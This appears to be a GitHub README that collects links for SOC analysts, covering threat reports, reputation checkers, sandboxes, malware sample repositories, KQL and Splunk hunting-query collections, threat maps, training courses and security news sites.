Are you starting a career as a SOC analyst? Or do you simply want to get a list of the most used tools in the cyber world? This repository is made for you, whether you are a level 1 or in a more advanced branch, you will find all the resources to make your work easier. Remember, the priority is to properly detect and identify the threat, so use everything you have at hand and avoid the crisis !
In this repository, several parts, one for monitoring, the list of tools to qualify malicious activity and finally, a list of queries to carry out your threat hunting properly. I've also added news sites and courses to train you between cyber attacks, when you have time.
| Website | Description |
|---|---|
| APT_CyberCriminal | This is a repository for various publicly-available documents and notes related to APT, sorted by year. |
| Mitre Attack | APT group and campaign list |
| Ransomwatch | Track Ransomware and leak activity over the web |
| FBI Internet Crime Report | As the cyber threat continues to evolve, the FBI remains appreciative of those who report cyber incidents to IC3. Information reported to the FBI helps advance our investigations. |
| FBI Fraud Report | The Internet Crime Complaint Center, or IC3, is the Nation's central hub for reporting cyber crime. It is run by the FBI, the lead federal agency for investigating cyber crime. |
| CISA Top Vulnerabilites | For the benefit of the cybersecurity community and network defenders—and to help every organization better manage vulnerabilities |
| Sophos Ransomware report | report on ransomware attacks, payments, and recovery costs from Sophos |
| SpyCloud Exposure report | Annual Identity Exposure Report unveils the latest cybercrime research, including data breach, malware & identity threat trends |
| NIST Cybersecurity | NIST collaborated with software developers, service providers, and users to develop secure software development guidance that is now mandatory for federal agency softwar e acquisition and use |
| Malware Traffic Analysis | This blog focuses on network traffic related to malware infections, mostly from Windows-based malware. |
| ANSSI Cyber Threat | the Agency reports a steadily rising cyber threat level, against a backdrop of new geopolitical tensions and international events being held in France |
| Fortinet | Top 20 Most Common Types of Cybersecurity Attacks |
| CrowdStrike | 10 Most Common Types of Cyber Attacks |
| MalwareByteLabs | Ransomware review 2024 |
| Website | Description |
|---|---|
| AbuseIP | Check IP reputation online and through public feeds |
| CriminalIP | First IP Malware Activity Checker Site |
| Shodan | Analyse hostname and IP and find mode |
| Netcraft | Historical analyzer, find infos about websites and dns |
| UrlScan | Scan a site's URL to find out if it is linked to suspicious activities |
| PaloAltosURL | URL scanner from the world's leading security company |
| JoeSandbow | Analyze your malware samples to observe their behavior |
| Yomi | A performance sandbox to analyze your malware |
| VirusTotal | Analyze a hash, file or URL and see if it has been reported by cyber companies |
| Hybrid Analysis | Another sandbox, analyze the files and see if they pose a risk |
| DocGuard | A document analyzer, malicious VB macros, hidden scripts... |
| MxToolBox | Check the reputation of an email domain and its records |
| TreatMining | Take informations about IOC |
| CyberChief | CyberChef is a web app that allows you to create and run recipes of data manipulation operations. You can use it to encrypt, decode, compress, analyze and transform data in various ways |
| PcapTotal | The platform is a successor to PacketTotal with over 100,000 PCAP files in its repository. Check if a malicious behavior is present in a network pcap |
| MD5Center | Reverse MD5 Hash (with no salt, for other use john or hashcat) |
| SHA1Center | Similar website, but for Sha1 reverse |
| PhishTank | Phishing website analysis |
| PulseDive | Ultimate centralized CTI tool, take informations about malware, IP, hash, Mitre tags |
| Censys | Censys helps you identify exposures that attackers are likely to exploit |
| DNSDumpster | Ultra powerfull DNS domain recon tool |
| Website | Description |
|---|---|
| MalwareDatabase | Malware Sample repository |
| VXunderground | Virus source code, online, free |
| Malware-Feed | Repository and list of the most active malware |
| Malware-Bazard | Collect samples for your tests from the most famous database in the world |
| Malware-Sample | Another repository, offering up-to-date samples |
| TheZoo | New repo, active, offering malwares samples |
| Website | Description |
|---|---|
| Sentinel & Defender KQL | KQL queries that can be used by anyone and are understandable. These queries are intended to increase detection coverage through the logs of Microsoft Security products |
| Awesome KQL | Awesome repository of detection R&D created exclusively by the Cylaris Threat Research Group |
| Sentinel Queries | Some tips, tricks and examples for using KQL for Microsoft Sentinel. |
| Threat-Hunting-KQL | Repository for threat hunting and detection queries, tools, etc. |
| Splunk Queries SOC | Most Useful SPLUNK Queries for SOC Analysts |
| Splunk queries | Compilation of Splunk queries collected and used over time |
| sserrato Splunk Queries | These are example so of queries I've run on Apache and Window Servers Logs as part of a 2022 course on cybersecurity where I was using Splunk for SOC monitoring |
| threathuntingspl | This is a repository to store Splunk code (SPL) and prototypes useful for building rules (correlation searches) and queries to find and hunt for malicious activity. |
| ThreatHuntingWithSplunk | Awesome Splunk SPL queries that can be used to detect the latest vulnerability exploitation attempts |
| IBM AQL | IBM Documentation for AQL queries |
| Explain Shell | Don't understand a command? Type it here |
| zzzcodeai | Don't understand code ? Specify the language and paste the code here |
| KQL for network OPS | If you query data that contains IP addresses this blog is something for you! |
| KQL for Sec OPS | In recent years Kusto Query Language (KQL) has gotten a more and ever increasing place in the cyber security world |
| FalconFriday | MDE hunting queries to detect offensive techniques |
| AzSentinelQueries | Sentinel hunting queries and Analytics rules |
| KQL | Therefore, in this repository on KQL-XDR-Hunting, I will be sharing 'out-of-the-box' KQL queries based on feedback, security blogs, and new cyber attacks to assist you in your threat hunting |
| Advanced Hunting KQL | Collection of Microsoft 365 Advanced Hunting Queries written in Kusto Query Language (KQL) |
| Sekoia-io ressources | This repository contains IOCs, cyber threat intelligence materials, hunting queries, detection rules, playbooks and much more to help you make the most of the capabilities of SEKOIA.IO XDR |
| CrowdStrike community | This hunting guide teaches you how to hunt for adversaries, suspicious activities, suspicious processes, and vulnerabilities using Falcon telemetry in Falcon Long-Term Repository (FLTR) |
| FortiSIEM | Documentation for FortiSOAR and FortiSIEM investigations |
| SigmaDoc | Documentation for Sigma detections rules |
| Website | Description |
|---|---|
| Checkpoint | See LIVE cyber attacks now with threat map |
| Kaspersky | Find out if you're under cyber-attack here |
| Radware | Radware's Live Threat Map presents near real-time information about cyberattacks as they occur, based on our global threat deception network and cloud systems event information |
| Fortinet | Is your network security keeping up with the latest threats? |
| Bitdefender | Bitdefender Advanced Threat Defense Cyber Map |
| Website | Description |
|---|---|
| RootMe | Train your hacking skills on various exercises and virtual environments |
| HackTheBox | This path covers core security monitoring and security analysis concepts and provides a deep understanding of the specialized tools, attack tactics, and methodology used by adversaries |
| TryHackMe | In the Junior Security Analyst role, you will be a Triage Specialist. You will spend a significant portion of your time triaging or monitoring the event logs and alerts. |
| Coursera | Coursera offers SOC analyst courses from IBM, Microsoft, PaloAlto and many other major players in the Cyber world |
| Let's defends | Develop the skills and experience to land a better job in cybersecurity |
| ICSI | SOC Analyst courses, Network Defense, Penstesting, Crest Approved. |
| ECC SOC-A | Engineered for current and aspiring Tier I and Tier II SOC analysts to achieve proficiency in performing entry-level and intermediate-level operations |
| Offsec-soc200 | Learn the foundations of cybersecurity defense with Foundational Security Operations and Defensive Analysis (SOC-200) |
| SecurityBlueTeam | BTL1 has been trusted around the world to train thousands of technical defenders in governments, CERTs, law enforcement, military units, MSSPs, financial institutions, critical national infrastructure, and more. |
| PluralSight | A cyber defense analyst uses defensive measures and information collected from a variety of sources to identify, analyze, and report events that occur or might occur within the network to protect information, information systems, and networks from threats. |
| Microsoft SC200 | Investigate, search for, and mitigate threats using Microsoft Sentinel, Microsoft Defender for Cloud, and Microsoft 365 Defender. |
| Splunk CCDA | Validate your skills to start as a SOC analyst using Splunk analytics, threat-hunting, risk-based alerting and industry best practices. |
| IBM SOCA | This intermediate level certification targets analysts that have knowledge and technical skills in CompTIA Cybersecurity and IBM Security QRadar SIEM |
| Cisco SOC | Free Course Junior SOC Analyst from Skill4All |
| CompTIA CySA+ | CompTIA Cybersecurity Analyst (CySA+) is a certification for cyber professionals tasked with incident detection, prevention and response through continuous security monitoring. |
| CompTIA Security+ | CompTIA Security+ is a global certification that validates the baseline skills necessary to perform core security functions and pursue an IT security career. |
| Website | Description |
|---|---|
| TheHackerNews | The Hacker News is the most trusted and popular cybersecurity publication for information security professionals seeking breaking news... |
| DarkReading | Dark Reading is a website that covers cybersecurity news, trends, and analysis. Find out the latest threats, vulnerabilities, breaches, and solutions for your organization. |
| Cybersecurity Hub | As a pioneer in the space, Cyber Security Hub is the definitive resource for the Cyber Security community. We gather global leaders around critical information in multiple formats, including daily commentary, interactive webinars, monthly events, and market reports... |
| Cybersecurity News | Cyber Security News is an Independent news platform which covers all the happenings in the Cyber World. Here We cover Ongoing threats, Research papers, Vulnerability, Data breaches and more. |
| Cyware | Cyware's cybersecurity automation platform automates security alert aggregation and advisory sharing into one platform designed to drive real-time situational awareness, expedite potential threat information exchange, and foster collaboration between security teams |
| /r/Cybersecurity | Join the discussion on cybersecurity topics, such as news, breaches, ransoms, tools, education, career, and more. Browse the latest posts, ask questions, share insights, and connect with other members of the r/cybersecurity subreddit |
| InfoSecurity | Infosecurity Magazine covers the latest news, opinions, webinars and white papers on information security and IT security topics. Find out about the US ban on Kaspersky, the LockBit ransomware, the NHS data breach and more |
| CyberdefenseMag | Do you like to write about Cyber Security? Looking for a exciting platform for your cyber security content to be seen? Well you have come to the right place! Cyber Defense Magazine is the hottest, cyber security news outlet and magazine in the industry |
| SecurityLedger | The Security Ledger is an independent security news website that explores the intersection of cyber security with business, commerce, politics and everyday life |
| GBHackers | GBHackers on security is a highly informative and reliable Cyber Security News platform that provides the latest and most relevant updates on Cyber Security News, Hacking News, Technology advancements, and Kali Linux tutorials on a daily basis |
| HackRead | Gateway to the world of the Internet that centers on Technology, Security, Privacy, Surveillance, Cyberwarfare, Cybercrime, and first-hand Hacking News, with full-scale reviews on Social Media Platforms. |
| Talos Itelligence | Cisco Talos Intelligence Group is one of the largest commercial threat intelligence teams in the world. Comprised of world-class cyber security researchers, analysts and engineers and supported by unrivaled telemetry, Talos defends Cisco customers against known and emerging threats... |
| TheGuardian/Cyber | Get the latest news, sport and opinion from the Guardian's US edition, the world's leading liberal voice on politics, culture and society |
| ProofPointBlog | The Proofpoint cybersecurity blog provides you with advanced cybersecurity intelligence and insights, threat research, and breaking cyber attack news. Get the latest news about advanced threats |
| r/SecurityCareerAdvice/ | This is a place to connect those seeking to learn with those who have walked the path before. Ask your questions about cybersecurity careers here, and mentors can choose to answer as they have time |
| /r/netsec/ | Join r/netsec, a community of technical information security enthusiasts, to share, discuss, and learn from the latest security content and news |
| Website | Description |
|---|---|
| 9QIX/HTB-SOCAnalystPrerequisites | This comprehensive learning journey spans 173 sections over 12 days, comprising 350 required cubes. The path delves into fundamental IT and Information Security subjects, covering networking, Linux and Windows operating systems, basic programming and scripting, and Assembly... |
| SOC-Community/Awesome-SOC | A collection of sources of documentation, and field best practices, to build and run a SOC (including CSIRT) |
| LetsDefend/awesome-soc-analyst | We just collected useful resources for SOC analysts and SOC analyst candidates. This repository is maintained by LetsDefend |
| awesome-list | Security lists for SOC/DFIR detections |
| hslatman/awesome-threat-intelligence | A curated list of awesome Threat Intelligence resources |
| Certification-Training/CEHv12 | Study notes for the EC-Council Certified Ethical Hacker CEH v12 exam by a3cipher |
| FreeCybersecurityEbooks | Collection of free cybersecurity-related e-books available on KnowledgeHub |
| awesome-list | Collection of detection lists, feeds and ioc - SIEM and Firewalls |